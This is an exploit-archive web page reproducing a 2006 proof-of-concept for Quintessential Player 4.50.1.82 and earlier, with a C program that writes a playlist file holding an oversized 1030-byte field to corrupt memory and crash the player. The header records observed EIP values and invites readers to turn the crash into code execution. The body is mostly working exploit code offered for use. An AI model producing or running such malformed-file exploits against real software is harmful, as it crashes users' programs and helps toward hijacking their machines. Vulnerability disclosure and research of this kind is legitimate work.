首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Quintessential Player <= 4.50.1.82 (Playlist) Denial of Service PoC
来源:GLinares.code@gmail.com 作者:Greg 发布时间:2006-11-29  

/*
0-day Quintessential Player <= 4.50.1.82 Playlist Denial Of Service PoC
========================================================================
========================================================================
Quintessential Player 4.50.1.82 and lower experiance a memory corruption
when attempting to parse out malformed Playlist files.
This possibly could lead to execution of code. Here is the proof of
concept in PLS format.

Note: M3u and M3u-8 are also affected by this problem.

EIP gets replaced by semi random values in the memory corruption
here are my experiances:
[Buffer = 1028 A's]

Buffer + X EIP = 0x009efe5a
Buffer + X EIP = 0x00f6eb81 2nd run
Buffer + AAAA EIP = 0x009efde2
Buffer + AAAA EIP = 0x009efdb3 2nd run
Buffer + AAAA EIP = 0x009efdb6 3rd run
Buffer + AAAABBBB EIP = 0x009efdea

(Using the NumberOfEntries made it more consistant)
Buffer + AAAA EIP = 0x00e13fd6 for 3 times until
Buffer + AAAA EIP = 0x00e13fda

If someone can figure out how to control EIP and cause this to become
a buffer overflow exploit, this can be exploited just like
the XMPlayer Buffer Overflow issue or the old Winamp UNC overflow.

if you figure it out, just credit me with my email somewhere in the code,
ill be more than happy :)


Happy Hunting and Happy Holidays to everyone

November 2006 Month Of Greg's Media Player Exploits :)
Discovered and Reported By: Greg Linares GLinares.code@gmail.com
Reported Exploit Date: 11/28/2006

*/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(int argc, char *argv[])
{

FILE *Exploit;
char buffer[1032]; /* Corruption Occurs after 1028 bytes */
int x;

printf("\n======================================================================\n");
printf("0-day Quintessential Player 4.50.1.82 and prior Playlist Denial Of Service PoC \n");
printf("Crashes Quintessential Player with a malformed playlist on load.\n");
printf("Discovered and Coded By: Greg Linares <GLinares.code[at]gmail[dot]com>\n");
printf("Usage: %s <output PLS file>\n", argv[0]);
printf("====================================================================\n\n\n");


if (argc < 2) {
printf("Invalid Number Of Arguments\n");
return 1;
}


Exploit = fopen(argv[1],"w");
if ( !Exploit )
{
printf("\nCouldn't Open File!");
return 1;
}

memset(buffer, 0, 1030);
for (x=0;x<1030;x++) {
strcat(buffer, "A");
}


/* Any field can be modified to cause the memory corruption NumberofEntries, Length, Filename, Title etc. */

fputs("[playlist]\r\nVersion=2\r\nNumberOfEntries=1", Exploit);
fputs("\r\nFile1=", Exploit);
fputs(buffer, Exploit);
fputs("\r\nTitle1=0-day_Quintessential_Player_4.50.1.82_and_prior_Playlist_Denial_Of_Service_PoC_By_Greg_Linares\r\n", Exploit);
fputs("Length1=512", Exploit);


printf("Exploit Succeeded...\n Output File: %s\n\n", argv[1]);


printf("Questions, Comments, Feedback --> Greg Linares (GLinares.code[at]gmail[dot]com)\n");

fclose(Exploit);
return 0;
}



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Discuz! 4.x SQL Injection / Ad
·Songbird Media Player <= 0.
·Evince Document Viewer (Docume
·Kubix <= 0.7 Multiple Remot
·PHP <= 4.4.4/5.1.6 htmlenti
·3ctftpsvc Buffer Overflow (Lon
·ProFTPD 1.3.0 (sreplace) Remot
·AT-TFTP Buffer Overflow (Long
·AT-TFTP <= 1.9 (Long Filena
·Exploits 3CTftpSvc Server 2.0.
·Oracle <= 9i / 10g (read/wr
·3Com TFTP Service <= 2.0.1
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved